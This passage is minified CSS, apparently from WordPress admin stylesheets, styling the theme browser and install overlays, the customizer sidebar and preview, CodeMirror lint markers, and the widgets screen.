.theme:nth-child(4n){margin-left:0}}@media only screen and (max-width:1120px){.theme-browser .theme{width:47.5%;margin-left:0}.theme-browser .theme:nth-child(2n){margin-left:0}.theme-browser .theme:nth-child(odd){margin-left:5%}}@media only screen and (max-width:960px){.theme-overlay .theme-wrap{right:65px}}@media only screen and (max-width:782px){.theme-overlay .theme-wrap,body.folded .theme-overlay .theme-wrap{top:0;left:0;bottom:0;right:0;padding:70px 20px 20px;border:none;z-index:100000;position:fixed}.theme-browser .theme.active .theme-name span{display:none}.theme-overlay .theme-screenshots{width:40%}.theme-overlay .theme-info{width:50%}.single-theme .theme-wrap{padding:10px}.theme-browser .theme .theme-actions{padding:5px 10px 4px}.theme-overlay.small-screenshot .theme-screenshots{position:static;float:none;max-width:302px}.theme-overlay.small-screenshot .theme-info{margin-right:0;width:auto}.theme.focus .more-details,.theme:hover .more-details,.theme:not(.active):focus .theme-actions,.theme:not(.active):hover .theme-actions{display:none}.theme-browser.rendered .theme.focus .theme-screenshot img,.theme-browser.rendered .theme:hover .theme-screenshot img{opacity:1}}@media only screen and (max-width:480px){.theme-browser .theme{width:100%;margin-left:0}.theme-browser .theme:nth-child(2n),.theme-browser .theme:nth-child(3n){margin-left:0}.theme-overlay .theme-about{bottom:105px}.theme-overlay .theme-actions{padding-right:4%;padding-left:4%}.theme-install-php .wp-filter .filter-count{margin-top:10px}}@media only screen and (max-width:650px){.theme-overlay .theme-description{margin-right:0}.theme-overlay .theme-actions .delete-theme{position:relative;left:auto;bottom:auto}.theme-overlay .theme-actions .inactive-theme{display:inline}.theme-overlay .theme-screenshots{width:100%;float:none;margin:0}.theme-overlay .theme-info{width:100%}.theme-overlay .theme-author{margin:5px 0 15px}.theme-overlay .current-label{margin-top:10px;font-size:13px}.themes-php .wp-filter-search{width:100%}.theme-install-php .wp-filter p.search-box{display:grid;row-gap:.5rem}.theme-browser .theme.add-new-theme span:after{font:normal 60px/90px dashicons;width:80px;height:80px;top:30%;right:50%;text-indent:0;margin-right:-40px}.single-theme .theme-wrap{margin:0 -10px 0 -12px;padding:10px}.single-theme .theme-overlay .theme-about{padding:10px;overflow:visible}.single-theme .current-label{display:none}.single-theme .theme-overlay .theme-actions{position:static}}.broken-themes{clear:both}.broken-themes table{text-align:right;width:50%;border-spacing:3px;padding:3px}.update-php .wrap{max-width:40rem}.theme-browser .theme .theme-installed{background:#2271b1}.theme-browser .theme .notice-success p:before{color:#68de7c;content:"\f147";content:"\f147"/'';display:inline-block;font:normal 20px/1 dashicons;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;vertical-align:top}.theme-install.updated-message:before{content:""}.theme-install-php .wp-filter{padding-right:20px}@media only screen and (max-width:1000px){.theme-install-php .wp-filter p.search-box{column-gap:.5rem}}.theme-install-php a.browse-themes,.theme-install-php a.upload{cursor:pointer}.plugin-install-tab-upload .upload-view-toggle .upload,.upload-view-toggle .browse{display:none}.plugin-install-tab-upload .upload-view-toggle .browse{display:inline}.upload-plugin,.upload-theme{box-sizing:border-box;display:none;margin:0;padding:50px 0;width:100%;overflow:hidden;position:relative;top:10px;text-align:center}.plugin-install-tab-upload .upload-plugin,.show-upload-view .upload-plugin,.show-upload-view .upload-plugin-wrap,.show-upload-view .upload-theme{display:block}.upload-plugin .wp-upload-form,.upload-theme .wp-upload-form{position:relative;margin:30px;display:inline-flex;justify-content:space-between;align-items:center;border:1px solid #c3c4c7;background:#f6f7f7}.upload-plugin .wp-upload-form input[type=file],.upload-theme .wp-upload-form input[type=file]{background:0 0;margin:0;padding:30px 30px 30px 0}.wp-upload-form input[type=submit].button{margin-left:30px}.upload-plugin .install-help,.upload-theme .install-help{color:#50575e;font-size:18px;font-style:normal;margin:0;padding:0;text-align:center}p.no-themes,p.no-themes-local{clear:both;color:#646970;font-size:18px;font-style:normal;margin:0;padding:100px 0;text-align:center;display:none}.no-results p.no-themes{display:block}.theme-install-php .add-new-theme{display:none!important}@media only screen and (max-width:1120px){.upload-plugin .wp-upload-form,.upload-theme .wp-upload-form{margin:20px 0;max-width:100%}.upload-theme .install-help{font-size:15px;padding:20px 0 0}}.theme-details .theme-rating{line-height:1.9}.theme-details .star-rating{display:inline}.theme-details .no-rating,.theme-details .num-ratings{font-size:11px;color:#646970}.theme-details .no-rating{display:block;line-height:1.9}.update-from-upload-comparison{border-top:1px solid #dcdcde;border-bottom:1px solid #dcdcde;text-align:right;margin:1rem 0 1.4rem;border-collapse:collapse;width:100%}.update-from-upload-comparison tr:last-child td{height:1.4rem;vertical-align:top}.update-from-upload-comparison tr:first-child th{font-weight:700;height:1.4rem;vertical-align:bottom}.update-from-upload-comparison td.name-label{text-align:left}.update-from-upload-comparison td,.update-from-upload-comparison th{padding:.4rem 1.4rem}.update-from-upload-comparison td.warning{color:#d63638}.update-from-upload-actions{margin-top:1.4rem}.appearance_page_custom-header #headimg{border:1px solid #dcdcde;overflow:hidden;width:100%}.appearance_page_custom-header #upload-form p label{font-size:12px}.appearance_page_custom-header .available-headers .default-header{float:right;margin:0 0 20px 20px}.appearance_page_custom-header .random-header{clear:both;margin:0 0 20px 20px;vertical-align:middle}.appearance_page_custom-header .available-headers label input,.appearance_page_custom-header .random-header label input{margin-left:10px}.appearance_page_custom-header .available-headers label img{vertical-align:middle}div#custom-background-image{min-height:100px;border:1px solid #dcdcde}div#custom-background-image img{max-width:400px;max-height:300px}.background-position-control input[type=radio]:checked~.button{background:#f0f0f1;border-color:#8c8f94;box-shadow:inset 0 2px 5px -3px rgba(0,0,0,.5);z-index:1}.background-position-control input[type=radio]:focus~.button{border-color:#4f94d4;box-shadow:inset 0 2px 5px -3px rgba(0,0,0,.5),0 0 3px rgba(34,113,177,.8);color:#1d2327}.background-position-control .background-position-center-icon,.background-position-control .background-position-center-icon:before{display:inline-block;line-height:1;text-align:center;transition:background-color .1s ease-in}.background-position-control .background-position-center-icon{height:20px;margin-top:13px;vertical-align:top;width:20px}.background-position-control .background-position-center-icon:before{background-color:#50575e;border-radius:50%;content:"";height:12px;width:12px}.background-position-control .button:hover .background-position-center-icon:before,.background-position-control input[type=radio]:focus~.button .background-position-center-icon:before{background-color:#1d2327}.background-position-control .button-group{display:block}.background-position-control .button-group .button{border-radius:0;box-shadow:none;height:40px!important;line-height:2.9!important;margin:0 0 0 -1px!important;padding:0 10px 1px!important;position:relative}.background-position-control .button-group .button:active,.background-position-control .button-group .button:focus,.background-position-control .button-group .button:hover{z-index:1}.background-position-control .button-group:last-child .button{box-shadow:0 1px 0 #c3c4c7}.background-position-control .button-group>label{margin:0!important}.background-position-control .button-group:first-child>label:first-child .button{border-radius:0 3px 0 0}.background-position-control .button-group:first-child>label:first-child .dashicons{transform:rotate(-45deg)}.background-position-control .button-group:first-child>label:last-child .button{border-radius:3px 0 0 0}.background-position-control .button-group:first-child>label:last-child .dashicons{transform:rotate(45deg)}.background-position-control .button-group:last-child>label:first-child .button{border-radius:0 0 3px 0}.background-position-control .button-group:last-child>label:first-child .dashicons{transform:rotate(45deg)}.background-position-control .button-group:last-child>label:last-child .button{border-radius:0 0 0 3px}.background-position-control .button-group:last-child>label:last-child .dashicons{transform:rotate(-45deg)}.background-position-control .button-group+.button-group{margin-top:-1px}body.full-overlay-active{overflow:hidden;visibility:hidden}.wp-full-overlay{background:0 0;z-index:500000;position:fixed;overflow:visible;top:0;bottom:0;right:0;left:0;height:100%;min-width:0}.wp-full-overlay-sidebar{box-sizing:border-box;position:fixed;min-width:300px;max-width:600px;width:18%;height:100%;top:0;bottom:0;right:0;padding:0;margin:0;z-index:10;background:#f0f0f1;border-left:none}.wp-full-overlay.collapsed .wp-full-overlay-sidebar{overflow:visible}.wp-full-overlay.collapsed,.wp-full-overlay.expanded .wp-full-overlay-sidebar{margin-right:0!important}.wp-full-overlay.expanded{margin-right:300px}.wp-full-overlay.collapsed .wp-full-overlay-sidebar{margin-right:-300px}@media screen and (min-width:1667px){.wp-full-overlay.expanded{margin-right:18%}.wp-full-overlay.collapsed .wp-full-overlay-sidebar{margin-right:-18%}}@media screen and (min-width:3333px){.wp-full-overlay.expanded{margin-right:600px}.wp-full-overlay.collapsed .wp-full-overlay-sidebar{margin-right:-600px}}.wp-full-overlay-sidebar:after{content:"";display:block;position:absolute;top:0;bottom:0;left:0;width:3px;z-index:1000}.wp-full-overlay-main{position:absolute;right:0;left:0;top:0;bottom:0;height:100%}.wp-full-overlay-sidebar .wp-full-overlay-header{position:absolute;right:0;left:0;height:45px;padding:0 15px;line-height:3.2;z-index:10;margin:0;border-top:none;box-shadow:none}.wp-full-overlay-sidebar .wp-full-overlay-header a.back{margin-top:3px}.wp-full-overlay-sidebar .wp-full-overlay-footer{bottom:0;border-bottom:none;border-top:none;box-shadow:none}.wp-full-overlay-sidebar .wp-full-overlay-sidebar-content{position:absolute;top:45px;bottom:45px;right:0;left:0;overflow:auto}.theme-install-overlay .wp-full-overlay-sidebar .wp-full-overlay-header{padding:0}.theme-install-overlay .close-full-overlay,.theme-install-overlay .next-theme,.theme-install-overlay .previous-theme{display:block;position:relative;float:right;width:45px;height:45px;background:#f0f0f1;border-left:1px solid #dcdcde;color:#3c434a;cursor:pointer;text-decoration:none;transition:color .1s ease-in-out,background .1s ease-in-out}.theme-install-overlay .close-full-overlay:focus,.theme-install-overlay .close-full-overlay:hover,.theme-install-overlay .next-theme:focus,.theme-install-overlay .next-theme:hover,.theme-install-overlay .previous-theme:focus,.theme-install-overlay .previous-theme:hover{background:#dcdcde;border-color:#c3c4c7;color:#000;outline:0;box-shadow:none}.theme-install-overlay .close-full-overlay:before{font:normal 22px/1 dashicons;content:"\f335";content:"\f335"/'';position:relative;top:7px;right:13px}.theme-install-overlay .previous-theme:before{font:normal 20px/1 dashicons;content:"\f345";content:"\f341"/'';position:relative;top:6px;right:14px}.theme-install-overlay .next-theme:before{font:normal 20px/1 dashicons;content:"\f341";content:"\f345"/'';position:relative;top:6px;right:13px}.theme-install-overlay .next-theme.disabled,.theme-install-overlay .next-theme.disabled:focus,.theme-install-overlay .next-theme.disabled:hover,.theme-install-overlay .previous-theme.disabled,.theme-install-overlay .previous-theme.disabled:focus,.theme-install-overlay .previous-theme.disabled:hover{color:#c3c4c7;background:#f0f0f1;cursor:default;pointer-events:none}.theme-install-overlay .close-full-overlay,.theme-install-overlay .next-theme,.theme-install-overlay .previous-theme{border-right:0;border-top:0;border-bottom:0}.theme-install-overlay .close-full-overlay:before,.theme-install-overlay .next-theme:before,.theme-install-overlay .previous-theme:before{top:2px;right:0}.wp-core-ui .wp-full-overlay .collapse-sidebar{position:fixed;bottom:0;right:0;padding:9px 10px 9px 0;height:45px;color:#646970;outline:0;line-height:1;background-color:transparent!important;border:none!important;box-shadow:none!important;border-radius:0!important}.wp-core-ui .wp-full-overlay .collapse-sidebar:focus,.wp-core-ui .wp-full-overlay .collapse-sidebar:hover{color:#2271b1}.wp-full-overlay .collapse-sidebar-arrow,.wp-full-overlay .collapse-sidebar-label{display:inline-block;vertical-align:middle;line-height:1.6}.wp-full-overlay .collapse-sidebar-arrow{width:20px;height:20px;margin:0 2px;border-radius:50%;overflow:hidden}.wp-full-overlay .collapse-sidebar:focus .collapse-sidebar-arrow,.wp-full-overlay .collapse-sidebar:hover .collapse-sidebar-arrow{box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent}.wp-full-overlay .collapse-sidebar-label{margin-right:3px}.wp-full-overlay.collapsed .collapse-sidebar-label{display:none}.wp-full-overlay .collapse-sidebar-arrow:before{display:block;content:"\f148";content:"\f148"/'';background:#f0f0f1;font:normal 20px/1 dashicons;padding:0;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.wp-core-ui .wp-full-overlay.collapsed .collapse-sidebar{padding:9px 10px}.rtl .wp-full-overlay .collapse-sidebar-arrow:before,.wp-full-overlay.collapsed .collapse-sidebar-arrow:before{transform:rotate(180.001deg)}.rtl .wp-full-overlay.collapsed .collapse-sidebar-arrow:before{transform:none}@media (prefers-reduced-motion:no-preference){.wp-full-overlay,.wp-full-overlay .collapse-sidebar,.wp-full-overlay-main,.wp-full-overlay-sidebar{transition-property:right,left,top,bottom,width,margin;transition-duration:.2s}}.wp-full-overlay{background:#1d2327}.wp-full-overlay-main{background-color:#f0f0f1}.expanded .wp-full-overlay-footer{position:fixed;bottom:0;right:0;min-width:299px;max-width:599px;width:18%;width:calc(18% - 1px);height:45px;border-top:1px solid #dcdcde;background:#f0f0f1}.wp-full-overlay-footer .devices-wrapper{float:left}.wp-full-overlay-footer .devices{position:relative;background:#f0f0f1;box-shadow:20px 0 10px -5px #f0f0f1}.wp-full-overlay-footer .devices button{cursor:pointer;background:0 0;border:none;height:45px;padding:0 3px;margin:0 -4px 0 0;box-shadow:none;border-top:1px solid transparent;border-bottom:4px solid transparent;transition:.15s color ease-in-out,.15s background-color ease-in-out,.15s border-color ease-in-out}.wp-full-overlay-footer .devices button:focus{box-shadow:none;outline:0}.wp-full-overlay-footer .devices button:before{display:inline-block;-webkit-font-smoothing:antialiased;font:normal 20px/30px dashicons;vertical-align:top;margin:3px 0;padding:4px 8px;color:#646970}.wp-full-overlay-footer .devices button.active{border-bottom-color:#1d2327}.wp-full-overlay-footer .devices button:focus,.wp-full-overlay-footer .devices button:hover{background-color:#fff}.wp-full-overlay-footer .devices button.active:hover,.wp-full-overlay-footer .devices button:focus{border-bottom-color:#2271b1}.wp-full-overlay-footer .devices button.active:before{color:#1d2327}.wp-full-overlay-footer .devices button:focus:before,.wp-full-overlay-footer .devices button:hover:before{color:#2271b1}.wp-full-overlay-footer .devices .preview-desktop:before{content:"\f472";content:"\f472"/''}.wp-full-overlay-footer .devices .preview-tablet:before{content:"\f471";content:"\f471"/''}.wp-full-overlay-footer .devices .preview-mobile:before{content:"\f470";content:"\f470"/''}@media screen and (max-width:1024px){.wp-full-overlay-footer .devices{display:none}}.collapsed .wp-full-overlay-footer .devices button:before{display:none}.preview-mobile .wp-full-overlay-main{margin:auto -160px auto 0;width:320px;height:480px;max-height:100%;max-width:100%;right:50%}.preview-tablet .wp-full-overlay-main{margin:auto -360px auto 0;width:720px;height:1080px;max-height:100%;max-width:100%;right:50%}.customize-support .hide-if-customize,.customize-support .wp-core-ui .hide-if-customize,.customize-support.wp-core-ui .hide-if-customize,.no-customize-support .hide-if-no-customize,.no-customize-support .wp-core-ui .hide-if-no-customize,.no-customize-support.wp-core-ui .hide-if-no-customize{display:none}#customize-container,#customize-controls .notice.notification-overlay{background:#f0f0f1;z-index:500000;position:fixed;overflow:visible;top:0;bottom:0;right:0;left:0;height:100%}#customize-container{display:none}#customize-container,.theme-install-overlay{visibility:visible}.customize-loading #customize-container iframe{opacity:0}#customize-container iframe,.theme-install-overlay iframe{height:100%;width:100%;z-index:20;transition:opacity .3s}#customize-controls{margin-top:0}.theme-install-overlay{display:none}.theme-install-overlay.single-theme{display:block}.install-theme-info{display:none;padding:10px 20px 60px}.single-theme .install-theme-info{padding-top:15px}.theme-install-overlay .install-theme-info{display:block}.install-theme-info .theme-install{float:left;margin-top:18px}.install-theme-info .theme-name{font-size:16px;line-height:1.5;margin-bottom:0;margin-top:0}.install-theme-info .theme-screenshot{margin:15px 0;width:258px;border:1px solid #c3c4c7;position:relative;overflow:hidden}.install-theme-info .theme-screenshot>img{width:100%;height:auto;position:absolute;right:0;top:0}.install-theme-info .theme-screenshot:after{content:"";display:block;padding-top:66.66666666%}.install-theme-info .theme-details{overflow:hidden}.theme-details .theme-version{margin:15px 0}.theme-details .theme-description{float:right;color:#646970;line-height:1.6;max-width:100%}.theme-install-overlay .wp-full-overlay-header .button{float:left;margin:7px 0 0 10px;min-height:32px;line-height:2.30769231}.theme-install-overlay .wp-full-overlay-sidebar{background:#f0f0f1;border-left:1px solid #dcdcde}.theme-install-overlay .wp-full-overlay-sidebar-content{background:#fff;border-top:1px solid #dcdcde;border-bottom:1px solid #dcdcde}.theme-install-overlay .wp-full-overlay-main{position:absolute;z-index:0;background-color:#f0f0f1}.customize-loading #customize-container{background-color:#f0f0f1}#customize-controls .notice.notification-overlay.notification-loading:before,#customize-preview.wp-full-overlay-main:before,.customize-loading #customize-container:before,.theme-install-overlay .wp-full-overlay-main:before{content:"";display:block;width:20px;height:20px;position:absolute;right:50%;top:50%;z-index:-1;margin:-10px -10px 0 0;transform:translateZ(0);background:transparent url(../images/spinner.gif) no-repeat center center;background-size:20px 20px}#customize-preview.wp-full-overlay-main.iframe-ready:before,.theme-install-overlay.iframe-ready .wp-full-overlay-main:before{background-image:none}@media print,(min-resolution:120dpi){.wp-full-overlay .collapse-sidebar-arrow{background-image:url(../images/arrows-2x.png);background-size:15px 123px}#customize-controls .notice.notification-overlay.notification-loading:before,#customize-preview.wp-full-overlay-main:before,.customize-loading #customize-container:before,.theme-install-overlay .wp-full-overlay-main:before{background-image:url(../images/spinner-2x.gif)}}@media screen and (max-width:782px){.available-theme .action-links .delete-theme{float:none;margin:0;padding:0;clear:both}.available-theme .action-links .delete-theme a{padding:0}.broken-themes table{width:100%}.theme-install-overlay .wp-full-overlay-header .button{font-size:13px}.theme-browser .theme .theme-actions .button{margin-bottom:0}.theme-browser .theme .theme-actions,.theme-browser .theme.active .theme-actions{padding-top:4px;padding-bottom:4px}.upload-plugin .wp-upload-form,.upload-theme .wp-upload-form{width:100%;box-sizing:border-box}.upload-plugin .wp-upload-form input[type=file],.upload-theme .wp-upload-form input[type=file]{padding:30px 30px 30px 0;width:100%}}.wrap [class*="CodeMirror-lint-marker"], .wp-core-ui [class*="CodeMirror-lint-message"], .wrap .CodeMirror-lint-marker-multiple { background-image: none; } .wp-core-ui .CodeMirror-lint-marker-error, .wp-core-ui .CodeMirror-lint-marker-warning { cursor: help; } .wrap .CodeMirror-lint-marker-multiple { position: absolute; top: 0; } .wrap [class*="CodeMirror-lint-marker"]:before { font: normal 18px/1 dashicons; position: relative; top: -2px; } .wp-core-ui [class*="CodeMirror-lint-message"]:before { font: normal 16px/1 dashicons; left: 16px; position: absolute; } .wp-core-ui .CodeMirror-lint-message-error, .wp-core-ui .CodeMirror-lint-message-warning { box-shadow: 0 1px 1px 0 rgba(0, 0, 0, 0.1); margin: 5px 0 2px; padding: 3px 12px 3px 28px; } .wp-core-ui .CodeMirror-lint-message-warning { background-color: #fcf9e8; border-left: 4px solid #dba617; } .wrap .CodeMirror-lint-marker-warning:before, .wp-core-ui .CodeMirror-lint-message-warning:before { content: "\f534"; color: #dba617; } .wp-core-ui .CodeMirror-lint-message-error { background-color: #fcf0f1; border-left: 4px solid #d63638; } .wrap .CodeMirror-lint-marker-error:before, .wp-core-ui .CodeMirror-lint-message-error:before { content: "\f153"; color: #d63638; } .wp-core-ui .CodeMirror-lint-tooltip { background: none; border: none; border-radius: 0; direction: ltr; } .wrap .CodeMirror .CodeMirror-matchingbracket { background: rgba(219, 166, 23, 0.3); color: inherit; } .CodeMirror { text-align: left; } .wrap .CodeMirror .CodeMirror-linenumber { color: #646970; } /*! This file is auto-generated */ .widget{margin:0 auto 10px;position:relative;box-sizing:border-box}.widget.open{z-index:99}.widget.open:focus-within{z-index:100}.widget-top{font-size:13px;font-weight:600;background:#f6f7f7}.widget-top .widget-action{border:0;margin:0;padding:10px;background:0 0;cursor:pointer}.widget-title h3,.widget-title h4{margin:0;padding:15px;font-size:1em;line-height:1;overflow:hidden;white-space:nowrap;text-overflow:ellipsis;-webkit-user-select:none;user-select:none}.widgets-holder-wrap .widget-inside{border-top:none;padding:1px 15px 15px;line-height:1.23076923}.widget.widget-dirty .widget-control-close-wrapper{display:none}#available-widgets .widget-description,#widgets-right a.widget-control-edit,.in-widget-title{color:#646970}.deleting .widget-title,.deleting .widget-top .widget-action .toggle-indicator:before{color:#a7aaad}.wp-core-ui .media-widget-control .selected,.wp-core-ui .media-widget-control.selected .not-selected,.wp-core-ui .media-widget-control.selected .placeholder{display:none}.media-widget-control.selected .selected{display:inline-block}.media-widget-buttons{text-align:left;margin-top:0}.media-widget-control .media-widget-buttons .button{width:auto;height:auto;margin-top:12px;white-space:normal}.media-widget-buttons .button:first-child{margin-right:8px}.media-widget-control .attachment-media-view .button-add-media,.media-widget-control .placeholder{border:1px dashed #c3c4c7;box-sizing:border-box;cursor:pointer;line-height:1.6;padding:9px 0;position:relative;text-align:center;width:100%}.media-widget-control .attachment-media-view .button-add-media{cursor:pointer;background-color:#f0f0f1;color:#2c3338}.media-widget-control .attachment-media-view .button-add-media:hover{background-color:#fff}.media-widget-control .attachment-media-view .button-add-media:focus{background-color:#fff;border-style:solid;border-color:#4f94d4;box-shadow:0 0 3px rgba(34,113,177,.8);outline:2px solid transparent;outline-offset:-2px}.media-widget-control .media-widget-preview{background:0 0;text-align:center}.media-widget-control .media-widget-preview .notice{text-align:initial}.media-frame .media-widget-embed-notice p code,.media-widget-control .notice p code{padding:0 3px 0 0}.media-frame .media-widget-embed-notice{margin-top:16px}.media-widget-control .media-widget-preview img{max-width:100%;vertical-align:middle;background-image:linear-gradient(45deg,#c3c4c7 25%,transparent 25%,transparent 75%,#c3c4c7 75%,#c3c4c7),linear-gradient(45deg,#c3c4c7 25%,transparent 25%,transparent 75%,#c3c4c7 75%,#c3c4c7);background-position:0 0,10px 10px;background-size:20px 20px}.media-widget-control .media-widget-preview .wp-video-shortcode{background:#000}.media-frame.media-widget .media-toolbar-secondary{min-width:300px}.media-frame.media-widget .attachment-display-settings .setting.align,.media-frame.media-widget .checkbox-setting.autoplay,.media-frame.media-widget .embed-link-settings .setting.link-text,.media-frame.media-widget .embed-media-settings .legend-inline,.media-frame.media-widget .embed-media-settings .setting.align,.media-frame.media-widget .image-details .embed-media-settings .setting.align,.media-frame.media-widget .replace-attachment{display:none}.media-widget-video-preview{width:100%}.media-widget-video-link{display:inline-block;min-height:132px;width:100%;background:#000}.media-widget-video-link .dashicons{font:normal 60px/1 dashicons;position:relative;width:100%;top:-90px;color:#fff;text-decoration:none}.media-widget-video-link.no-poster .dashicons{top:30px}.media-frame #embed-url-field.invalid,.media-widget-image-link>.link:invalid{border:1px solid #d63638}.media-widget-image-link{margin:1em 0}.media-widget-gallery-preview{display:flex;justify-content:flex-start;flex-wrap:wrap;margin:-1.79104477%}.media-widget-preview.media_gallery,.media-widget-preview.media_image{cursor:pointer}.media-widget-preview .placeholder{background:#f0f0f1}.media-widget-gallery-preview .gallery-item{box-sizing:border-box;width:50%;margin:0;background:0 0}.media-widget-gallery-preview .gallery-item .gallery-icon{margin:4.5%}.media-widget-gallery-preview .gallery-item:nth-last-child(3):first-child,.media-widget-gallery-preview .gallery-item:nth-last-child(3):first-child~.gallery-item,.media-widget-gallery-preview .gallery-item:nth-last-child(n+5),.media-widget-gallery-preview .gallery-item:nth-last-child(n+5)~.gallery-item,.media-widget-gallery-preview .gallery-item:nth-last-child(n+6),.media-widget-gallery-preview .gallery-item:nth-last-child(n+6)~.gallery-item{max-width:33.33%}.media-widget-gallery-preview .gallery-item img{height:auto;vertical-align:bottom}.media-widget-gallery-preview .gallery-icon{position:relative}.media-widget-gallery-preview .gallery-icon-placeholder{position:absolute;top:0;bottom:0;width:100%;box-sizing:border-box;display:flex;align-items:center;justify-content:center;background-color:rgba(0,0,0,.5)}.media-widget-gallery-preview .gallery-icon-placeholder-text{font-weight:600;font-size:2em;color:#fff}.widget.ui-draggable-dragging{min-width:100%}.widget.ui-sortable-helper{opacity:.8}.widget-placeholder{border:1px dashed #c3c4c7;margin:0 auto 10px;height:45px;width:100%;box-sizing:border-box}#widgets-right .widget-placeholder{margin-top:0}#widgets-right .closed .widget-placeholder{height:0;border:0;margin-top:-10px}.sidebar-name{position:relative;box-sizing:border-box}.js .sidebar-name{cursor:pointer}.sidebar-name .handlediv{float:right;width:38px;height:38px;border:0;margin:0;padding:8px;background:0 0;cursor:pointer;outline:0}#widgets-right .sidebar-name .handlediv{margin:5px 3px 0 0}.sidebar-name .handlediv:focus{box-shadow:none;outline:1px solid transparent}#widgets-left .sidebar-name .toggle-indicator{display:none}#widgets-left .sidebar-name .handlediv:focus .toggle-indicator,#widgets-left .sidebar-name:hover .toggle-indicator,#widgets-left .widgets-holder-wrap.closed .sidebar-name .toggle-indicator{display:block}.sidebar-name .toggle-indicator:before{padding:1px 2px 1px 0;border-radius:50%}.sidebar-name .handlediv:focus .toggle-indicator:before{box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent}.sidebar-name h2,.sidebar-name h3{margin:0;padding:8px 10px;overflow:hidden;white-space:normal;line-height:1.5}.widgets-holder-wrap .description{padding:0 0 15px;margin:0;font-style:normal;color:#646970}.inactive-sidebar .description,.widget-holder .description{color:#50575e}#widgets-right .widgets-holder-wrap .description{padding-left:7px;padding-right:7px}div.widget-liquid-left{margin:0;width:38%;float:left}div.widget-liquid-right{float:right;width:58%}div#widgets-left{padding-top:12px}div#widgets-left .closed .sidebar-name,div#widgets-left .inactive-sidebar.closed .sidebar-name{margin-bottom:10px}div#widgets-left .sidebar-name h2,div#widgets-left .sidebar-name h3{padding:10px 0;margin:0 10px 0 0}#widgets-left .widgets-holder-wrap,div#widgets-left .widget-holder{background:0 0;border:none}#widgets-left .widgets-holder-wrap{border:none;box-shadow:none}#available-widgets .widget{margin:0}#available-widgets .widget:nth-child(odd){clear:both}#available-widgets .widget .widget-description{display:block;padding:10px 15px;font-size:12px;overflow-wrap:break-word;word-wrap:break-word;-ms-word-break:break-all;word-break:break-word;hyphens:auto}#available-widgets #widget-list{position:relative}#widgets-left .inactive-sidebar{clear:both;width:100%;background:0 0;padding:0;margin:0 0 20px;border:none;box-shadow:none}#widgets-left .inactive-sidebar.first{margin-top:40px}div#widgets-left .inactive-sidebar .widget.expanded{left:auto}.widget-title-action{float:right;position:relative}div#widgets-left .inactive-sidebar .widgets-sortables{min-height:42px;padding:0;background:0 0;margin:0;position:relative}div#widgets-right .sidebars-column-1,div#widgets-right .sidebars-column-2{max-width:450px}div#widgets-right .widgets-holder-wrap{margin:10px 0 0}div#widgets-right .sidebar-description{min-height:20px;margin-top:-5px}div#widgets-right .sidebar-name h2,div#widgets-right .sidebar-name h3{padding:15px 15px 15px 7px}div#widgets-right .widget-top{padding:0}div#widgets-right .widgets-sortables{padding:0 8px;margin-bottom:9px;position:relative;min-height:123px}div#widgets-right .closed .widgets-sortables{min-height:0;margin-bottom:0}.remove-inactive-widgets .spinner,.sidebar-name .spinner{float:none;position:relative;top:-2px;margin:-5px 5px}.sidebar-name .spinner{position:absolute;top:18px;right:30px}#widgets-right .widgets-holder-wrap.widget-hover{border-color:#787c82;box-shadow:0 1px 2px rgba(0,0,0,.3)}.widget-access-link{float:right;margin:-5px 0 10px 10px}.widgets_access #widgets-left .widget .widget-top{cursor:auto}.widgets_access #wpwrap .widget-control-edit,.widgets_access #wpwrap .widgets-holder-wrap.closed .sidebar-description,.widgets_access #wpwrap .widgets-holder-wrap.closed .widget{display:block}.widgets_access #widgets-left .widget .widget-top:hover,.widgets_access #widgets-right .widget .widget-top:hover{border-color:#dcdcde}#available-widgets .widget-action .edit,#available-widgets .widget-control-edit .edit,#widgets-left .inactive-sidebar .widget-action .add,#widgets-left .inactive-sidebar .widget-control-edit .add,#widgets-right .widget-action .add,#widgets-right .widget-control-edit .add{display:none}.widget-control-edit{display:block;color:#646970;background:#f0f0f1;padding:0 15px;line-height:3.30769230;border-left:1px solid #dcdcde}#widgets-left .widget-control-edit:hover,#widgets-right .widget-control-edit:hover{color:#fff;background:#3c434a;border-left:0;outline:1px solid #3c434a}.widgets-holder-wrap .sidebar-description,.widgets-holder-wrap .sidebar-name{-webkit-user-select:none;user-select:none}.editwidget{margin:0 auto}.editwidget .widget-inside{display:block;padding:0 15px}.widget-control-actions{display:flex;align-items:center;justify-content:space-between}.editwidget .widget-control-actions{margin-top:20px}.js .closed br.clear,.js .widgets-holder-wrap.closed .description,.js .widgets-holder-wrap.closed .remove-inactive-widgets,.js .widgets-holder-wrap.closed .sidebar-description,.js .widgets-holder-wrap.closed .widget{display:none}.js .widgets-holder-wrap.closed .widget.ui-sortable-helper{display:block}.widget-description,.widget-inside{display:none}.widget-inside{background:#fff}.widget-inside select{max-width:100%}#removing-widget{display:none;font-weight:400;padding-left:15px;font-size:12px;line-height:1;color:#000}.js #removing-widget{color:#72aee6}#access-off,.no-js .widget-holder .description,.widget-control-noform,.widgets_access #access-on,.widgets_access .handlediv,.widgets_access .widget-action,.widgets_access .widget-holder .description{display:none}.widgets_access #widget-list,.widgets_access .widget-holder{padding-top:10px}.widgets_access #access-off{display:inline}.widgets_access .sidebar-name,.widgets_access .widget .widget-top{cursor:default}.widget-liquid-left #widgets-left.chooser #available-widgets .widget,.widget-liquid-left #widgets-left.chooser .inactive-sidebar{transition:opacity .1s linear}.widget-liquid-left #widgets-left.chooser #available-widgets .widget,.widget-liquid-left #widgets-left.chooser .inactive-sidebar{opacity:.2;pointer-events:none}.widget-liquid-left #widgets-left.chooser #available-widgets .widget-in-question{opacity:1;pointer-events:auto}#available-widgets .widget-top:hover,#widgets-left .widget-in-question .widget-top,#widgets-left .widget-top:hover,.widgets-chooser ul,div#widgets-right .widget-top:hover{border-color:#8c8f94;box-shadow:0 1px 2px rgba(0,0,0,.1)}.widgets-chooser ul.widgets-chooser-sidebars{margin:0;list-style-type:none;max-height:300px;overflow:auto}.widgets-chooser{display:none}.widgets-chooser ul{border:1px solid #c3c4c7}.widgets-chooser li{border-bottom:1px solid #c3c4c7;background:#fff;margin:0;position:relative}.widgets-chooser .widgets-chooser-button{width:100%;padding:10px 15px 10px 35px;background:0 0;border:0;box-sizing:border-box;text-align:left;cursor:pointer;transition:background .2s 